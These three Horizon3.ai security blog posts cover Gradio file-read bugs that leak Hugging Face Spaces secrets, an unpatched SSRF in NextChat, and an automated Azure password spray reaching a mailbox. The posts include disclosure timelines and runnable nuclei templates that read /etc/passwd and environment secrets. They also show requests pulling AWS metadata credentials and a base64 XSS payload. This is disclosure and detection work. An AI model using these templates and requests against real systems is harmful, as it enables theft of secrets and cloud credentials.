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Exploiting File Read Vulnerabilities in Gradio to Steal Secrets from Hugging Face Spaces

On Friday, May 31, the AI company Hugging Face disclosed a potential breach where attackers may have gained unauthorized access to secrets stored in their Spaces platform.

This reminded us of a couple of high severity vulnerabilities we disclosed to Hugging Face affecting their Gradio framework last December. When we reported these vulnerabilities, we demonstrated that they could lead to the exfiltration of secrets stored in Spaces.

Hugging Face responded in a timely way to our reports and patched Gradio. However, to our surprise, even though these vulnerabilities have long been patched, these old vulnerabilities were, up until recently, still exploitable on the Spaces platform for apps running with an outdated Gradio version.

This post walks through the vulnerabilities we disclosed and their impact, and our recent effort to work with Hugging Face to harden the Spaces platform after the reported potential breach. We recommend all users of Gradio upgrade to the latest version, whether they are using Gradio in a Hugging Face Space or self-hosting.


Gradio is a popular open-source Python-based web application framework for developing and sharing AI/ML demos. The framework consists of a backend server that hosts a standard set of REST APIs and a library of front-end components that users can plug in to develop their apps. A number of popular AI apps use Gradio such as the Stable Diffusion Web UI and Text Generation Web UI.

Users have several options for sharing Gradio apps: hosting it in a Hugging Face Space; self-hosting; or using the Gradio share feature, which exposes their machine to the Internet using a Gradio-provided proxy URL similar to ngrok.

A Hugging Face Space provides the foundation for hosting an app using Hugging Face’s infrastructure, which runs on Kubernetes. Users use Git to manage their source code and a Space to build, deploy, and host their app. Gradio is not the only way to develop apps – the Spaces platform also supports apps developed using Streamlit. Docker, or static HTML.

Within a Space, users can define secrets, such as Hugging Face tokens or API keys, that can be used by their app. These secrets are accessible to the application as environment variables. This method for secret storage is a step up from storing secrets in source code.

File Read Vulnerabilities in Gradio

Last December we disclosed to Hugging Face a couple of high severity vulnerabilities, CVE-2023-51449 and CVE-2024-1561, that allow attackers to read arbitrary files from a server hosting Gradio, regardless of whether it was self-hosted, shared using the share feature, or hosted in a Hugging Face space. In a Hugging Face space, it was possible for attackers to exploit these vulnerabilities to access secrets stored in environment variables by reading the /proc/self/environ pseudo-file.


CVE-2023-51449, which affects Gradio versions 4.0 – 4.10, is a path traversal vulnerability in the file endpoint. This endpoint is supposed to only serve files stored within a Gradio temporary directory. However we found that the check for making sure a requested file was contained within the temporary directory was flawed.

The check on line 935 to prevent path traversal doesn’t account for subdirectories inside the temp folder. We found that we could use the upload endpoint to first create a subdirectory within the temp directory, and then traverse out from that subdirectory to read arbitrary files using the ../ or %2e%2e%2f sequence.

To read environment variables, one can request the /proc/self/environ pseudo-file using a HTTP Range header:

Interestingly, CVE-2023-51449 was introduced in version 4.0 as part of a refactor and appears to be a regression of a prior vulnerability CVE-2023-34239. This same exploit was tested to work against Gradio versions prior to 3.33.


Below is a nuclei template for testing this vulnerability:

id: CVE-2023-51449
  name: CVE-2023-51449
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33
    - https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2
    cvss-score: 7.5
    cve-id: CVE-2024-51449
  tags: cve2024, cve, gradio, lfi

  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311

        Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
        Content-Type: application/octet-stream


      - |
        GET /file={{download_path}}{{path}} HTTP/1.1
        Host: {{Hostname}}

      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
          - "\\[\"(.+)okmijnuhbygv\"\\]"

        - ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
        - ../../../../../../../../../../../../../../../etc/passwd

    matchers-condition: and
      - type: regex
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      - type: status
          - 200


  • Dec. 17, 2023: Horizon3 reports vulnerability over email to Hugging Face.
  • Dec. 18, 2023: Hugging Face acknowledges report
  • Dec. 20, 2023: GitHub advisory published. Issue fixed in Gradio 4.11. (Note Gradio used this advisory to cover two separate findings, one for the LFI we reported and another for a SSRF reported by another researcher)
  • Dec. 22, 2023: CVE published
  • Dec. 24, 2023: Hugging Face confirms fix over email with commit https://github.com/gradio-app/gradio/issues/6816


CVE-2024-1561 arises from an input validation flaw in the component_server API endpoint that allows attackers to invoke internal Python backend functions. Depending on the Gradio version, this can lead to reading arbitrary files and accessing arbitrary internal endpoints (full-read SSRF). This affects Gradio versions 3.47 to 4.12. This is notable because the last version of Gradio 3 is 3.50.2, and a number of users haven’t made the transition yet to Gradio 4 because of the major refactor between versions 3 and 4. The vulnerable code:

On line 702, an arbitrary user-specified function is invoked against the specified component object.

For Gradio versions 4.3 – 4.12, the move_resource_to_block_cache function is defined in the base class of all Component classes. This function copies arbitrary files into the Gradio temp folder, making them available for attackers to download using the file endpoint. Just like CVE-2023-51449, this vulnerability can also be used to grab the /proc/self/environ pseudo-file containing environment variables.

In Gradio versions 3.47 – 3.50.2, a similar function called make_temp_copy_if_needed can be invoked on most Component objects.

In addition, in Gradio versions 3.47 to 3.50.2 another function called download_temp_copy_if_needed can be invoked to read the contents of arbitrary HTTP endpoints and store the results into the temp folder for retrieval, resulting in a full-read SSRF.

There are other component-specific functions that can be invoked across different Gradio versions, and their effects vary per component.


The following nuclei templates can be used to test for CVE-2024-1561.

File read against Gradio 4.3-4.12:

id: CVE-2024-1561-4x
  name: CVE-2024-1561-4x
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, this template works for Gradio versions 4.3-4.12
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "1", "data": "{{path}}", "fn_name": "move_resource_to_block_cache", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
          - "\"?([^\"]+)"

        - c:\\windows\\win.ini
        - /etc/passwd

    matchers-condition: and
      - type: regex
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      - type: status
          - 200

File read against Gradio 3.47 – 3.50.2:

id: CVE-2024-1561-3x
  name: CVE-2024-1561-3x
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, this version should work for versions 3.47 - 3.50.2
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{fuzz_component_id}}", "data": "{{path}}", "fn_name": "make_temp_copy_if_needed", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
          - "\"?([^\"]+)"
    attack: clusterbomb
        - 1
        - 2
        - 3
        - 4
        - 5
        - 6
        - 7
        - 8
        - 9
        - 10
        - 11
        - 12
        - 13
        - 14
        - 15
        - 16
        - 17
        - 18
        - 19
        - 20
        - c:\\windows\\win.ini
        - /etc/passwd

    matchers-condition: and
      - type: regex
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      - type: status
          - 200

Exploiting the SSRF against Gradio 3.47-3.50.2:

id: CVE-2024-1561-3x-ssrf
  name: CVE-2024-1561-3x-ssrf
  author: nvn1729
  severity: high
  description: Gradio Full Read SSRF when auth is not enabled, this version should work for versions 3.47 - 3.50.2
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{fuzz_component_id}}", "data": "http://{{interactsh-url}}", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
          - "\"?([^\"]+)"
        - 1
        - 2
        - 3
        - 4
        - 5
        - 6
        - 7
        - 8
        - 9
        - 10
        - 11
        - 12
        - 13
        - 14
        - 15
        - 16
        - 17
        - 18
        - 19
        - 20

    matchers-condition: and
      - type: status
          - 200

      - type: regex
        part: body
          - <html><head></head><body>[a-z0-9]+</body></html>


If you look up CVE-2024-1561 in NVD or MITRE, you’ll see that it was filed by the Huntr CNA and credited to another security researcher on the Huntr platform. In fact, that Huntr report was filed after our original report to Hugging Face, and after the vulnerability was already patched in the mainline. Due to various delays in getting a CVE assigned, Huntr assigned a CVE for this issue prior to us getting a CVE. Here is the actual timeline:

  • Dec. 20, 2023: Horizon3 reports vulnerability over email to Hugging Face.
  • Dec. 24, 2023: Hugging Face acknowledges report
  • Dec. 27, 2023: Fix merged to mainline with commit https://github.com/gradio-app/gradio/pull/6884
  • Dec. 28, 2023: Huntr researcher reports same issue on the Huntr platform here https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
  • Jan 3, 2024: Hugging Face confirms to Horizon3 over email that the vulnerability is fixed with commit https://github.com/gradio-app/gradio/pull/6884 in version 4.13
  • Feb. 2024: Huntr gets confirmation from Gradio this issue is already fixed. Huntr may not have realized it was fixed prior to the report to them.
  • Mar. 17, 2024: Horizon3 checks with Gradio on filing a CVE
  • Mar. 23, 2024: Horizon3 files CVE request with MITRE
  • Apr. 15, 2024: Huntr published CVE-2024-1561
  • May 5, 2024: After multiple follow ups, MITRE assigns CVE-2024-34511 to this vulnerability
  • May 10, 2024: We ask MITRE to reject CVE-2024-34511 as a duplicate after realizing Huntr already had a CVE assigned.

Leaking Secrets in Hugging Face Spaces

As demonstrated above, both vulnerabilities CVE-2023-51449 and CVE-2024-1561 can be used to read arbitrary files from a server hosting Gradio. This includes the /proc/self/environ file on Linux systems containing environment variables. At the time of disclosing these vulnerabilities to Hugging Face, we set up a Hugging Face Space at https://huggingface.co/spaces/nvn1729/hello-world and showed that these vulnerabilities could be exploited to leak secrets configured for the Space. Below is an example of what the environment variable output looks like (with some data redacted). The user configured secrets and variables are shown in bold.

PATH=REDACTED^@HOSTNAME=REDACTED@GRADIO_THEME=huggingface^@TQDM_POSITION=-1^@TQDM_MININTERVAL=1^@SYSTEM=spaces^@SPACE_AUTHOR_NAME=nvn1729^@SPACE_ID=nvn1729/hello-world^@SPACE_SUBDOMAIN=nvn1729-hello-world^@CPU_CORES=2^@mysecret=mysecretvalue^@MEMORY=16Gi^@SPACE_HOST=nvn1729-hello-world.hf.space^@SPACE_REPO_NAME=hello-world^@SPACE_TITLE=Hello World^@myvariable=variablevalue^^@REDACTED

When we heard of the potential breach from Hugging Face on Friday, May 31, we were curious if it was possible that these old vulnerabilities were still exploitable on the Spaces platform. We started up the Space and were surprised to find that it was still running the same vulnerable Gradio version, 4.10, from December.

And the vulnerabilities we had reported were still exploitable. We then the checked the Gradio versions for other Spaces and found that a substantial portion were out of date, and therefore potentially vulnerable to exfiltration of secrets.

It turns out that the Gradio version used by an app is generally fixed at the time a user develops and publishes an app to a Space. A file called README.md controls the Gradio version in use (3.50.2 in this example). It’s up to users to manually update their Gradio version.

We reported the issue to Hugging Face and highlighted that old Gradio Spaces could be exploited by bad actors to steal secrets. Hugging Face responded promptly and implemented measures over the course of a week to harden the Spaces environment:

Hugging Face configured new rules in their β€œweb application firewall” to neutralize exploitation of CVE-2023-51449, CVE-2024-1561, and other file read vulnerabilities reported by other researchers (CVE-2023-34239, CVE-2024-4941, CVE-2024-1728, CVE-2024-0964) that could be used to leak secrets. We iteratively tested different methods for exploiting all of these vulnerabilities and provided feedback to Hugging Face that was incorporated to harden the WAF.

Hugging Face sent out email notifications to users of Gradio Spaces recommending that users upgrade to the latest version.

Along with e-mail notifications, Hugging Face updated their Spaces user interface to highlight if a Space is running an old Gradio version.


  • Dec. 18, 2023: We set up a test Space running Gradio 4.10 and demonstrate leakage of Space secrets as part of reporting CVE-2023-51449 and CVE-2024-1561
  • May 31, 2024: Hugging Face discloses potential breach
  • June 2, 2024: We revive the test Space and confirm it’s still running Gradio 4.10 and can be exploited to leak Space secrets. We verify there exist other Spaces running old versions. Β We report this to Hugging Face.
  • June 3 – 9, 2024: Hugging Face updates their WAF based on our feedback to prevent exploitation of Gradio vulnerabilities that can lead to leakage of secrets.
  • June 7, 2024: Hugging Face sends out emails to users running outdated versions of Gradio, and rolls out an update to their user interface recommending that users upgrade.

We appreciate Hugging Face’s prompt response in improving their security posture.


In Hugging Face’s breach advisory, they noted that they proactively revoked some Hugging Face tokens that were stored as secrets in Spaces, and that users should refresh any keys or tokens as well. In this post, we’ve shown that old vulnerabilities in Gradio can still be exploited to leak Spaces secrets, and even if they are rotated, an attacker can still get access to them. Therefore, in addition to rotating secrets, we recommend users double check if they are running an outdated Gradio version and upgrade to the latest version if required.

To be clear: We have no idea whether this method of exploiting Gradio led to secrets being leaked in the first place, but the path we’ve shown in this post was available to attackers up til recently.

To upgrade a Gradio Space, a user can visit the README.md file in their Space and click β€œUpgrade”, as shown below:

Alternatively, users could stop storing secrets in their Gradio Space or enable authentication for their Gradio Space.

While Hugging Face did harden their WAF to neutralize exploitation, we caution users from thinking that this will truly protect them. At best, it’ll prevent exploitation by script kiddies using off-the-shelf POCs. It’s only a matter of time before bypasses are discovered.

Finally for users of Gradio that are exposing it to the Internet using a Gradio share URL or self-hosting, we recommend enabling authentication and also ensuring it’s updated to the latest version.

Sign up for a free trial and quickly verify you’re not exploitable.

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The post Exploiting File Read Vulnerabilities in Gradio to Steal Secrets from Hugging Face Spaces appeared first on Horizon3.ai.

NextChat: An AI Chatbot That Lets You Talk to Anyone You Want To

With the advent of generative AI, AI chatbots are everywhere. While users can chat with large-langage models (LLMs) using a SaaS provider like OpenAI, there are lots of standalone chatbot applications available for users to deploy and use too. These standalone applications generally offer a richer user interface than OpenAI, additional features such as the ability to plug in and test different models, and the ability to potentially bypass IP block restrictions.

From our research, the most widely deployed standalone Gen AI chatbot is NextChat, a.k.a ChatGPT-Next-Web. This is a GitHub project with 63K+ stars and 52K+ forks. The Shodan queryΒ  title:NextChat,"ChatGPT Next Web" pulls up 7500+ exposed instances, mostly in China and the US.

This application is vulnerable to a critical full-read server-side request forgery (SSRF) vulnerability, CVE-2023-49785, that we disclosed to the vendor in November 2023. As of this writing, there is no patch for the vulnerability, and since 90+ days has passed since our original disclosure, we are now releasing full details here.

CVE-2023-49785: A Super SSRF

NextChat is a Next.js-based Javascript application, and most of its functionality is implemented as client-side code.

There are, however, a few exposed server endpoints. One of these endpoints is at /api/cors, and it functions by design as an open proxy, allowing unauthenticated users to send arbitrary HTTP requests through it. This endpoint appears to have been added to support saving client-side chat data to WebDAV servers. The presence of this endpoint is an anti-pattern: it allows clients to bypass built in browser protections for accessing cross-domain resources by accessing them through a server-side endpoint instead.

For instance to access Google through this proxy, one can make the following request:

SSRF vulnerabilities vary considerably in terms of real-world impact. This particular SSRF is about as bad as it gets. It’s dangerous because:

  • It enables access to arbitrary HTTP endpoints, including any internal endpoints
  • It returns the full response from any accessed HTTP endpoints
  • It supports arbitrary HTTP methods such as POST, PUT, etc by setting the method header. Request bodies are also passed along.
  • URL query parameters can be passed along with URL encoding.
  • It supports passing along an Authorization header in requests.

If this application is exposed on the Internet, an attacker essentially has full access to any other HTTP resources accessible in the same internal network as the application. The only limitation is passing along other headers such as Cookie or Content-Type, though there may be creative ways to inject these headers.

Here’s an example of accessing the AWS cloud metadata service to retrieve AWS access keys off an AWS EC2 instance running with IMDSv1 enabled:

sh-3.2# curl
  "Code" : "Success",
  "LastUpdated" : "2024-03-08T00:22:17Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA-REDACTED",
  "SecretAccessKey" : "C2CW-REDACTED",
  "Token" : "IQoJb3JpZ2luX2VjENH-REDACTED",
  "Expiration" : "2024-03-08T06:58:15Z"

Reflected XSS

Almost all reflected XSS vulnerabilities are of little value to attackers. But we thought it was interesting to note that this vulnerability can be used to directly trigger an XSS without loading another site. This is because the fetch method used by the /api/cors endpoint also supports the data protocol.

For instance, the following payload:


will be decoded to <script>alert(document.domain)</script> at the server and sent back to the client, resulting in XSS:


Our assessment of this vulnerability puts the CVE base score at 9.1 (critical). The vulnerability not only enables read access to internal HTTP endpoints but also write access using HTTP POST, PUT, and other methods. Attackers can also use this vulnerability to mask their source IP by forwarding malicious traffic intended for other Internet targets through these open proxies.

As of this writing, there is no patch for the vulnerability. More than 90 days has passed since our original contact.

  • Nov. 25, 2023: Horizon3 reports security issue to ChatGPT-Next-Web via GitHub vulnerability disclosure process
  • Nov. 26, 2023: Vendor accepts the report
  • Dec. 6, 2023: GitHub CNA reserves CVE-2023-49785
  • Jan. 15, 2024: Horizon3 asks vendor for an update using the GitHub security issue. No response.
  • Mar. 7, 2024: Horizon3 asks vendor for an update using the GitHub security issue. No response.
  • Mar. 11, 2024: Public disclosure

We recommend that users not expose this application on the Internet. If it must be exposed to the Internet, ensure it is an isolated network with no access to any other internal resources. Beware that attackers can still use the application as an open proxy to disguise malicious traffic to other targets through it.


The following nuclei template can be used to detect this vulnerability. The vulnerable code was introduced in Sept. 2023. The majority of instances online, including any instances using the more recent β€œNextChat” name, are highly likely to be vulnerable.

id: CVE-2023-49785

  name: CVE-2023-49785
  author: nvn1729
  severity: critical
  description: Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web
  remediation: |
    Do not expose to the Internet
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-49785
  tags: cve-2023-49785,ssrf,xss

  - method: GET
      - "{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23"
      - "{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"

    matchers-condition: and
      - type: word
        part: interactsh_protocol # Confirms the DNS interaction from second request
          - "dns"
      - type: dsl
          - 'contains(body_1, "<script>alert(document.domain)</script>") && contains(header_1, "text/html")' # XSS validation in first request
          - 'contains(header_2, "X-Interactsh-Version")' # Or got HTTP response back from Interact server


Over the last two years, we have observed the rapid pace of development of new generative AI applications, and there is a big appetite to use and experiment with these applications. We’ve also observed a steady blurring of lines between personal use and corporate use. While NextChat is primarily meant for personal use, we’ve seen it in a few of our own client environments.

Security has simply not kept up, both AppSec practices and vulnerability disclosure processes. The focus of the infosec community and media at large has been on β€œsecurity harms” like prompt injection or model poisoning, but there are lots of high impact, conventional vulnerabilities to be found. We recommend users exercise caution when exposing any unvetted Gen AI tools to the Internet.


Sign up for a free trial and quickly verify you’re not exploitable.

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The post NextChat: An AI Chatbot That Lets You Talk to Anyone You Want To appeared first on Horizon3.ai.

NodeZero APT: Azure Password Spray Leads to Business Email Compromise

On January 19, 2024, Microsoft disclosed a major security incident in which the email of Microsoft senior executives and other staff were accessed by Midnight Blizzard a.k.a Cozy Bear, a nation-state threat actor affiliated with Russia. Microsoft determined that the actor got initial access using password spray to compromise a legacy non-production test tenant account in Microsoft Entra ID (formerly Azure AD). The actor then moved laterally using the excessive permissions granted to that test account to access the email of Microsoft employees.

Password spray is a surprisingly simple and effective technique we’ve written about before. In a password spray attack, an attacker tries to login to a lot of accounts using a few probable passwords, with the hope that at least one account is using a weak password.

In this real-world external pentest, we’ll show NodeZero conducting a password spray attack against Microsoft Entra ID to get initial access to a client’s tenant account, similar to what Midnight Blizzard did. From there NodeZero detects that multi-factor authentication is disabled and breaks into the email of the compromised user.

A Real World Example

In this example, a client conducted an external pentest using NodeZero. NodeZero ran from Horizon3.ai’s cloud environment and was not provided any credentials.

Configuring an External Pentest for Password Spray

When defining the assets in scope for this pentest, the client provided NodeZero a list of company-owned domains. NodeZero uses these domains to enumerate Azure tenants that belong to the client.

In the Attack Configuration for the pentest, the MS Entra (Azure AD) Password Spray flag was also enabled. This is on by default.

To avoid locking out accounts, NodeZero only attempts three passwords an hour. A duration of time can be set for how long the pentest runs, in order to get in more password spray attempts.

Attack Path

Here are the steps NodeZero took in this test to get to business email compromise:

  1. NodeZero used the provided domains to discover a Microsoft Entra tenant associated with the client.
  2. NodeZero used open source intelligence (OSINT) to discover potential usernames associated with the client.
  3. NodeZero verified which users are actual users belonging to the client’s tenant.
  4. NodeZero sprayed a highly probable password against all verified users. One of the users hit!
  5. NodeZero then discovered that MFA was disabled for the user. NodeZero logged into the user’s account and acquired an Azure access and refresh token.
  6. NodeZero then accessed the user’s Microsoft365 inbox.

The full attack path is shown below:


It took NodeZero less than 10 minutes to execute this attack path leading to business email compromise, starting with no privileges in the form of credentials or network access. This attack was performed autonomously with no human assistance or prior scripting.

The impact of business email compromise is huge. Not only can attackers access potentially sensitive data, they can use the compromised account to conduct lateral phishing attacks and further escalate privileges.

Microsoft has been rolling out MFA for all its tenants, but in practice we’ve seen that there have been gaps in this rollout, just as Microsoft experienced with its own legacy test tenant. The application of MFA also depends on how the tenant is configured. Use NodeZero to verify your true security posture!

Sign up for a free trial and quickly verify you’re not exploitable.

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The post NodeZero APT: Azure Password Spray Leads to Business Email Compromise appeared first on Horizon3.ai.
